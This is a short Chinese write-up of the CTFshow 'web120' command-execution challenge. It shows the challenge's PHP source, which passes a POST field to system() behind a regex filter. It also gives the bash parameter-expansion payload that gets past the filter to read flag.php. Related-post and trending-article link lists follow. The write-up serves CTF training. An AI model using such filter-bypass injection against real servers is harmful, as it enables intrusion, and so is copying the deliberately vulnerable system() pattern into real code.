CTFshow 命令执行 web120
目录
- 源码
- 思路
- 题解
- 总结
源码
<?php
error_reporting(0);
highlight_file(__FILE__);
if(isset($_POST['code'])){$code=$_POST['code'];if(!preg_match('/\x09|\x0a|[a-z]|[0-9]|PATH|BASH|HOME|\/|\(|\)|\[|\]|\\\\|\+|\-|\!|\=|\^|\*|\x26|\%|\<|\>|\'|\"|\`|\||\,/', $code)){ if(strlen($code)>65){echo '<div align="center">'.'you are so long , I dont like '.'</div>';}else{echo '<div align="center">'.system($code).'</div>';}}else{echo '<div align="center">evil input</div>';}
}?>
思路
拼接了 /bin/nl 发现没回显 没思路了
看了下hint:
/bin/cat flag.php
${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???
说明题目$USER 最后一位是a 这个一般都猜不到吧
题解
code=${PWD::${#SHLVL}}???${PWD::${#SHLVL}}?${USER:~A}? ????.???
总结
感觉题目不是很好
CTFshow 命令执行 web120相关推荐
- CTFshow——命令执行
CTFshow--命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){$c = $_GET['c'];if(!preg_matc ...
- CTFshow命令执行29-123
命令执行 WEB29 eval是php中执行以PHP脚本执行的命令 PHP命令可以执行脚本命令 本题使用方法是先 system(cp f*.php 1.txt) 然后访问1.txt WEB30 在PH ...
- CTFshow 命令执行 web72
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...
- [CTFSHOW]命令执行
文章目录 web 29 web 30 web 31 web32 web33-36 web37 web38 web40 web41 web42 web43 web44 web45 web46 web47 ...
- ctfshow 命令执行 web29-web77 web118-122 web124 wp
南神博客 文章目录 命令执行 web29 web30 web31 web32 web33 web34 web35 web36 web37 web38 web39 web40 web41 web42 w ...
- ctfshow命令执行篇
web31 echo(`ls%09/`); echo(`tac%09fla*`); web32 过滤; 关键命令执行函数也不能用 用文件包含 其实这个做法也是靠刷题经验猜flag路径 c=includ ...
- [CTFSHOW]命令执行55-74
web 55 if(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\< ...
- ctfshow命令执行(持续更新,已更至web39)
做命令执行题比前两种慢很多,到现在也只做了总数的五分之一,慢慢来吧. web29 web30 web31 web32 web33~36 web37 web38 web39 web29 题目如下: er ...
- CTFshow 命令执行 web56
目录 源码 思路 题解 总结 源码 <?php/* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 ...
最新文章
- MongoDB sharding迁移那些事(一)
- html2canvas解决保存图片模糊问题
- html table导出到Excel中,不走后台,js完成
- python实现搜索之二分查找
- zoj 1078 palindrom numbers
- 如何才能成为一个成功的项目经理
- php实现ppt样式效果源码,jQuery移动端和桌面设备的轻量级幻灯片特效源码
- php _line_,php基本语法
- UE5热更新(Pak包的Cook,打包,加载,踩过的一些坑)
- 记录一下,不是所有的韩语输入法apk,装到同一个系统,都能弹出软键盘
- ps怎么撤销参考线_干货技巧 | Photoshop10大奇技淫巧(肯定有你不知道的!)
- 【easyui】之DataGrid数据显示
- OpenERP-指定动作视图
- 优漫动游平面设计的形式美
- 紅米android os,红米7A 魔趣OS 安卓10 纯净完美 原生极简 纯净推荐
- 认识区块链,认知区块链——百花争鸣
- 计算机网络举例说明,什么是计算机网络,举例说明计算机网络有哪些应用?
- 简述TCP的流量控制与拥塞控制
- 跨域解决方式——JSONP,CORS
- MySQL迁移到kdb_Q语言把mysql输入导入到KDB+数据库
热门文章
- YUI Grid CSS的优雅设计(转)
- python项目实战:最简单的图片转字符画
- MySQL修改datadir目录
- MySQL利用xtrabackup进行增量备份详细过程汇总
- php无法加载Memcache缓存模块问题及Memcache的安装
- 关于伪静态网站的好处
- QuickFlow之任务代理-TaskDelegation
- 打地鼠程序代码C语言,自己用C写的一个简单的打地鼠游戏代码出了个问题(鼠标和循环不能...
- linux 查看ftp账户,linux的ftp服务之本地访问浏览与虚拟账户
- matlab下的textread()